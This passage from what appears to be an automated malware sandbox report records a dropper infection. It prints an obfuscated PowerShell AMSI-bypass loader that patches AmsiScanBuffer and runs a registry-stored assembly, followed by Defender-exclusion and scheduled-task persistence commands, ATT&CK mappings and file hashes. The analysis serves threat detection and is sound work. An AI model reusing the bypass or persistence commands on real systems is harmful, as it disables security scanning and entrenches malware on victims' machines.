@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$mfRTcLTNEmN=$KqxHmocLDfROj.GetMethod('G'+[Char](101)+''+[Char](116)+''+'M'+''+[Char](111)+''+[Char](100)+'u'+'l'+''+'e'+'Hand'+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+'e'+''+[Char](114)+''+[Char](110)+''+'e'+''+'l'+''+'3'+''+'2'+''+[Char](46)+''+[Char](100)+''+'l'+'l')));$YMlkRxdnaWyFAI=$ttXBfgwKaDGfzt.Invoke($Null,@([Object]$mfRTcLTNEmN,[Object](''+[Char](76)+''+'o'+''+[Char](97)+''+[Char](100)+''+'L'+''+'i'+''+[Char](98)+''+[Char](114)+''+[Char](97)+'r'+'y'+''+[Char](65)+'')));$kfCJJTUxukdqDBjAz=$ttXBfgwKaDGfzt.Invoke($Null,@([Object]$mfRTcLTNEmN,[Object](''+'V'+''+[Char](105)+''+[Char](114)+''+[Char](116)+'u'+[Char](97)+''+[Char](108)+'P'+[Char](114)+''+[Char](111)+''+'t'+''+[Char](101)+''+[Char](99)+''+'t'+'')));$DfOiDQE=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($YMlkRxdnaWyFAI,$MiczOqSgzdZJKvWLGyl).Invoke('a'+'m'+''+[Char](115)+''+[Char](105)+''+[Char](46)+'d'+[Char](108)+''+[Char](108)+'');$wMhbpGQwRBEOuqBrg=$ttXBfgwKaDGfzt.Invoke($Null,@([Object]$DfOiDQE,[Object](''+[Char](65)+'m'+[Char](115)+''+[Char](105)+''+[Char](83)+''+'c'+''+'a'+''+'n'+'B'+'u'+''+[Char](102)+'f'+'e'+'r')));$viBKMdjqFa=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($kfCJJTUxukdqDBjAz,$QLnNtOWEbaGrXIzwfgOrsK).Invoke($wMhbpGQwRBEOuqBrg,[uint32]8,4,[ref]$viBKMdjqFa);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$wMhbpGQwRBEOuqBrg,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($kfCJJTUxukdqDBjAz,$QLnNtOWEbaGrXIzwfgOrsK).Invoke($wMhbpGQwRBEOuqBrg,[uint32]8,0x20,[ref]$viBKMdjqFa);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+'O'+''+[Char](70)+''+[Char](84)+''+[Char](87)+''+'A'+''+'R'+''+[Char](69)+'').GetValue(''+[Char](36)+'N'+'o'+''+[Char](100)+''+'e'+''+[Char](115)+''+[Char](116)+''+'a'+''+[Char](103)+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4980

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1236

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
1⤵
PID:1284

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1296

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
- Indicator Removal: Clear Windows Event Logs
PID:1424

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1456

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1504
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:2548

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1524

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1544

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1720

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1768

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
1⤵
PID:1792

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1832

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1892

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1900

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1920

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:2032

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:2044

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2124

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2252

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2432

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2440

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
1⤵
PID:2504

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2612

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2620

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2628

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2652

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2668

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2696

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:544

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:2896

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of UnmapMainImage
PID:3324
- C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node64.exe
  "C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node64.exe"
  2⤵
  - Adds Run key to start application
  - Drops file in System32 directory
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3076
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\$Node32.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3108
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /Create /F /TN "$Node32" /SC ONLOGON /TR "C:\Windows\System32\$Node32.exe" /RL HIGHEST
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:4112
- - C:\Windows\System32\$Node32.exe
    "C:\Windows\System32\$Node32.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:420
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\$Node2Json.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4684
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /Create /F /TN "$Node2Json" /SC ONLOGON /TR "C:\Windows\System32\$Node2Json.exe" /RL HIGHEST
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:2376
- - C:\Windows\System32\$Node2Json.exe
    "C:\Windows\System32\$Node2Json.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:1468
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\$Node3Json.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2404
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /Create /F /TN "$Node3Json" /SC ONLOGON /TR "C:\Windows\System32\$Node3Json.exe" /RL HIGHEST
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:748
- - C:\Windows\System32\$Node3Json.exe
    "C:\Windows\System32\$Node3Json.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:3580

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3456

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
1⤵
PID:3508

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3908

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3980

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3988

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
1⤵
PID:4028

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
1⤵
PID:4244

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
1⤵
PID:4444

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:5048

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:3184

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:2744

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:660

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:2408

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:2300

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:2900

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3392

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:700

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:5080

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
PID:4432

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Indicator Removal

T1070

Clear Windows Event Logs

T1070.001

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
627073ee3ca9676911bee35548eff2b8

SHA1
4c4b68c65e2cab9864b51167d710aa29ebdcff2e

SHA256
85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

SHA512
3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
2e8eb51096d6f6781456fef7df731d97

SHA1
ec2aaf851a618fb43c3d040a13a71997c25bda43

SHA256
96bfd9dd5883329927fe8c08b8956355a1a6ceb30ceeb5d4252b346df32bc864

SHA512
0a73dc9a49f92d9dd556c2ca2e36761890b3538f355ee1f013e7cf648d8c4d065f28046cd4a167db3dea304d1fbcbcea68d11ce6e12a3f20f8b6c018a60422d2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
64497dba662bee5d7ae7a3c76a72ed88

SHA1
edc027042b9983f13d074ba9eed8b78e55e4152e

SHA256
ca69ebbd2c9c185f0647fb2122d7a26e7d23af06a1950fb25ac327d869687b47

SHA512
25da69ec86ba0df6c7da60f722cc2919c59c91f2bb03137e0e87771936e5271522d48eef98030a0da41f7a707d82221d35fb016f8bb9a294e87be114adbe3522

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5mwqczlg.tdt.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Windows\System32\$Node2Json.exe

Filesize
116KB

MD5
41814c2aa6f0aaffaaaa26ffd07b3550

SHA1
ea9731c42a382ed003b5b4bfd28c3ba437c8d14a

SHA256
da2926ac30bda874255c093b58a8a4efa4b8e7872393ea4a242f17a4e3ab014e

SHA512
f2513d8e10536bd747dd1ec4a6aa9ec0007ea9a4484c364b2cf9d5ffd42cf3bcd0e346040d4c34c3dba28a208752b82c41bdae2a9dd88ebc1ba869cd1907877d

Download Submit
C:\Windows\System32\$Node32.exe

Filesize
163KB

MD5
b850f016450d68da0ae4bb945355f70c

SHA1
521726c38af715e6ee1c76315151f0ed9518c6f4

SHA256
8a649909d1defa1b8966cde6ad854f3cbf7662a732cf1a16b853c793cf240d24

SHA512
30f152e08ba44308da9b9c42951e45a9b6c2ad808c3a426da4af0384939816e04f1faf38de1d3c404e515d90b2e2eaeabe152b0151fb3f21c6a00bd2fdac3b6c

Download Submit
C:\Windows\System32\$Node3Json.exe

Filesize
117KB

MD5
391d4f99d0076ce566b370f1572ef670

SHA1
0bf04beb77440315098bacf30563a6542e254a45

SHA256
b55dbc5b3437654eca9fd1ea4826f81bde74af9e0c69109c25188461eb6a3605

SHA512
1952fa90fc139863381c15f424a8146335cbbc6f443efcdffc502f1064889a244fa7da1b30ebd4c9b2bec15fd55d367a2aa80afd576b1e2c4baed40ffec76497

Download Submit
memory/424-141-0x0000021D006E0000-0x0000021D0070A000-memory.dmp

Filesize
168KB

Download
memory/424-146-0x0000021D006E0000-0x0000021D0070A000-memory.dmp

Filesize
168KB

Download
memory/424-147-0x00007FFC1B410000-0x00007FFC1B420000-memory.dmp

Filesize
64KB

Download
memory/632-111-0x0000023185450000-0x000002318547A000-memory.dmp

Filesize
168KB

Download
memory/632-109-0x00000231851D0000-0x00000231851F5000-memory.dmp

Filesize
148KB

Download
memory/632-116-0x0000023185450000-0x000002318547A000-memory.dmp

Filesize
168KB

Download
memory/632-117-0x00007FFC1B410000-0x00007FFC1B420000-memory.dmp

Filesize
64KB

Download
memory/632-110-0x0000023185450000-0x000002318547A000-memory.dmp

Filesize
168KB

Download
memory/704-126-0x0000015750770000-0x000001575079A000-memory.dmp

Filesize
168KB

Download
memory/704-121-0x0000015750770000-0x000001575079A000-memory.dmp

Filesize
168KB

Download
memory/704-127-0x00007FFC1B410000-0x00007FFC1B420000-memory.dmp

Filesize
64KB

Download
memory/732-151-0x000001EBA2DA0000-0x000001EBA2DCA000-memory.dmp

Filesize
168KB

Download
memory/1008-136-0x0000018B98340000-0x0000018B9836A000-memory.dmp

Filesize
168KB

Download
memory/1008-137-0x00007FFC1B410000-0x00007FFC1B420000-memory.dmp

Filesize
64KB

Download
memory/1008-131-0x0000018B98340000-0x0000018B9836A000-memory.dmp

Filesize
168KB

Download
memory/1468-55-0x0000000000D10000-0x0000000000D32000-memory.dmp

Filesize
136KB

Download
memory/2404-70-0x000001B646560000-0x000001B6466AF000-memory.dmp

Filesize
1.3MB

Download
memory/3076-1-0x0000000000E20000-0x0000000000E82000-memory.dmp

Filesize
392KB

Download
memory/3076-2-0x00007FFC3A150000-0x00007FFC3AC12000-memory.dmp

Filesize
10.8MB

Download
memory/3076-91-0x00007FFC3A150000-0x00007FFC3AC12000-memory.dmp

Filesize
10.8MB

Download
memory/3076-0-0x00007FFC3A153000-0x00007FFC3A155000-memory.dmp

Filesize
8KB

Download
memory/3108-12-0x00007FFC3A150000-0x00007FFC3AC12000-memory.dmp

Filesize
10.8MB

Download
memory/3108-11-0x000002454C3F0000-0x000002454C412000-memory.dmp

Filesize
136KB

Download
memory/3108-19-0x000002454C460000-0x000002454C5AF000-memory.dmp

Filesize
1.3MB

Download
memory/3108-16-0x00007FFC3A150000-0x00007FFC3AC12000-memory.dmp

Filesize
10.8MB

Download
memory/3108-15-0x00007FFC3A150000-0x00007FFC3AC12000-memory.dmp

Filesize
10.8MB

Download
memory/3108-14-0x00007FFC3A150000-0x00007FFC3AC12000-memory.dmp

Filesize
10.8MB

Download
memory/3108-13-0x00007FFC3A150000-0x00007FFC3AC12000-memory.dmp

Filesize
10.8MB

Download
memory/3108-20-0x00007FFC3A150000-0x00007FFC3AC12000-memory.dmp

Filesize
10.8MB

Download
memory/3384-96-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/3384-97-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/3384-100-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/3384-101-0x00007FFC5B380000-0x00007FFC5B589000-memory.dmp

Filesize
2.0MB

Download
memory/3384-106-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/3384-102-0x00007FFC5A600000-0x00007FFC5A6BD000-memory.dmp

Filesize
756KB

Download
memory/3384-95-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/3384-98-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/3580-90-0x0000000000C00000-0x0000000000C22000-memory.dmp

Filesize
136KB

Download
memory/4684-40-0x0000025872640000-0x000002587278F000-memory.dmp

Filesize
1.3MB

Download
memory/4980-105-0x0000022855CE0000-0x0000022855E2F000-memory.dmp

Filesize
1.3MB

Download
memory/4980-92-0x0000022856150000-0x000002285617A000-memory.dmp

Filesize
168KB

Download
memory/4980-93-0x00007FFC5B380000-0x00007FFC5B589000-memory.dmp

Filesize
2.0MB

Download
memory/4980-94-0x00007FFC5A600000-0x00007FFC5A6BD000-memory.dmp

Filesize
756KB

Download